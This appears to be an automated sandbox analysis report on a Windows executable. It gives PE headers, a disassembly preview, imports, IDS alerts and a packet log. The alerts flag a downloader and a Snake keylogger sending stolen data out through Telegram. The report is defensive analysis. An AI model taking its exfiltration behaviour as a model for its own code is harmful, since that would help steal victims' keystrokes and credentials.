Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007FED40CBD053h
push ebx
call 00007FED40CC031Dh
cmp eax, ebx
je 00007FED40CBD049h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FED40CC0297h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FED40CBD02Ch
push 0000000Ah
call 00007FED40CC02F0h
push 00000008h
call 00007FED40CC02E9h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007FED40CC02DDh
cmp eax, ebx
je 00007FED40CBD051h
push 0000001Eh
call eax
test eax, eax
je 00007FED40CBD049h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x21068	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x21068	0x21200	03ed2ed76ba15352dac9e48819696134	False	0.8714696344339623	data	7.556190648348207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x554c0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x55828	0xc2a3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9966684729162903
RT_ICON	0x61ad0	0x86e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.990210843373494
RT_ICON	0x6a1b0	0x5085	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9867559307233299
RT_ICON	0x6f238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4358921161825726
RT_ICON	0x717e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4896810506566604
RT_ICON	0x72888	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5367803837953091
RT_ICON	0x73730	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6913357400722022
RT_ICON	0x73fd8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.38597560975609757
RT_ICON	0x74640	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.4934971098265896
RT_ICON	0x74ba8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.651595744680851
RT_ICON	0x75010	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.46908602150537637
RT_ICON	0x752f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5472972972972973
RT_DIALOG	0x75420	0x120	data	English	United States	0.53125
RT_DIALOG	0x75540	0x118	data	English	United States	0.5678571428571428
RT_DIALOG	0x75658	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x75778	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x75870	0xa0	data	English	United States	0.6125
RT_DIALOG	0x75910	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x75970	0xae	data	English	United States	0.6091954022988506
RT_VERSION	0x75a20	0x308	data	English	United States	0.47036082474226804
RT_MANIFEST	0x75d28	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T00:04:15.689028+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49705	142.250.186.78	443	TCP
2025-01-11T00:04:20.641993+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	193.122.130.0	80	TCP
2025-01-11T00:04:27.173384+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	193.122.130.0	80	TCP
2025-01-11T00:04:27.847490+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49784	149.154.167.220	443	TCP
2025-01-11T00:04:28.155649+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49784	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:04:14.546508074 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:14.546545029 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:14.546689034 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:14.560691118 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:14.560705900 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.226109028 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.226264954 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.227648020 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.227739096 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.394640923 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.394681931 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.395167112 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.395224094 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.399024010 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.439326048 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.689023972 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.689279079 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.689301014 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.689340115 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.689629078 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.689691067 CET	443	49705	142.250.186.78	192.168.2.5
Jan 11, 2025 00:04:15.689735889 CET	49705	443	192.168.2.5	142.250.186.78
Jan 11, 2025 00:04:15.717082977 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:15.717128038 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:15.717197895 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:15.717627048 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:15.717649937 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:16.372529984 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:16.372670889 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:16.378149986 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:16.378175020 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:16.378540993 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:16.380213022 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:16.380642891 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:16.427334070 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.919419050 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.919514894 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:18.925307989 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.925395966 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:18.937696934 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.937777042 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:18.937800884 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.937895060 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:18.944051027 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:18.944108963 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.009730101 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.009825945 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.009856939 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.009869099 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.009879112 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.009884119 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.009922028 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.010195971 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.010257006 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.014770031 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.014837980 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.014863968 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.014929056 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.021070004 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.021178007 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.021203041 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.021262884 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.027487993 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.028223038 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.028234005 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.028275013 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.033684015 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.033843994 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.033852100 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.033910036 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.040102005 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.040251970 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.040273905 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.040328979 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.046345949 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.046401024 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.046427965 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.046471119 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.052186966 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.052257061 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.052273989 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.052323103 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.058001041 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.058084011 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.058094978 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.058145046 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.063694000 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.063771009 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.063781977 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.063865900 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.069458961 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.069665909 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.074817896 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.075030088 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.075309992 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.075423002 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.100403070 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.100564957 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.100589037 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.100630999 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.100649118 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.100761890 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.100795984 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.100804090 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.100825071 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.100847006 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.101170063 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.101236105 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.101260900 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.101514101 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.101522923 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.101632118 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.101684093 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.101692915 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.102006912 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.105907917 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.105997086 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.106019974 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.106056929 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.111339092 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.111476898 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.111495972 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.111541033 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.116338968 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.116493940 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.116503954 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.116544008 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.121735096 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.121803999 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.121815920 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.121859074 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.127744913 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.127832890 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.127861977 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.127904892 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.135169029 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.135231018 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.135237932 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.135334015 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.146336079 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.146398067 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.146408081 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.146450043 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.157720089 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.157774925 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.157793999 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.157845020 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.158626080 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.158704042 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.158767939 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.158814907 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.159131050 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.159178019 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.159285069 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.159331083 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.160044909 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.160094976 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.160743952 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.160809040 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.160815001 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.160856009 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.160861015 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.160919905 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.160959959 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.161011934 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.161025047 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.161052942 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.161062002 CET	443	49711	172.217.16.193	192.168.2.5
Jan 11, 2025 00:04:19.161073923 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.161091089 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.161104918 CET	49711	443	192.168.2.5	172.217.16.193
Jan 11, 2025 00:04:19.595201969 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:19.600155115 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:19.600244045 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:19.600739002 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:19.605675936 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:20.343686104 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:20.348366976 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:20.353277922 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:20.598328114 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:20.641993046 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:20.990341902 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:20.990376949 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:20.990447044 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:20.993060112 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:20.993077040 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.458178997 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.458339930 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:21.464464903 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:21.464493036 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.464848042 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.478431940 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:21.523334980 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.587506056 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.587563992 CET	443	49749	104.21.16.1	192.168.2.5
Jan 11, 2025 00:04:21.587606907 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:21.593924046 CET	49749	443	192.168.2.5	104.21.16.1
Jan 11, 2025 00:04:27.021626949 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:27.026473045 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:27.125792027 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:04:27.137552023 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.137615919 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.137701035 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.138174057 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.138212919 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.173383951 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:04:27.797231913 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.797313929 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.799690962 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.799711943 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.800029993 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.801692009 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.847331047 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:27.847382069 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:27.847393036 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:28.155710936 CET	443	49784	149.154.167.220	192.168.2.5
